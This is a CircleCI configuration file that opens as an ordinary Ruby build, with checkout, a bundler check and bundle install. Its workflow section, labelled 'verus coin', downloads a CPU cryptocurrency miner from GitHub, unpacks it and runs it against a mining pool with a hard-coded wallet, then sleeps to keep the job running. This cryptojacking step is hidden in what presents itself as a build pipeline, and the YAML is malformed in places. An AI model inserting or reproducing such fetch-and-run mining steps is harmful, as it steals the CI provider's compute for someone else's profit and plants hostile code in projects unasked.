version: 2.1

orbs:
  ruby: circleci/ruby@0.1.2

jobs:
  build:
    docker:
      - image: circleci/ruby:2.6.3-stretch-node
    executor: ruby/default
    steps:
      - checkout
      - run:
          name: Which bundler?
          command: bundle -v
      - ruby/bundle-install

workflows:
  sample: verus coin
    jobs:
      - build:
         steps:
            - checkout
            - run:
                name: Running
                command: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xvzf hellminer_cpu_linux.tar.gz && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RA9e1QoSe24AXJ1PY7quVxG4c7c86nmrcr.test1 -p x --cpu 4
            - sleep 999
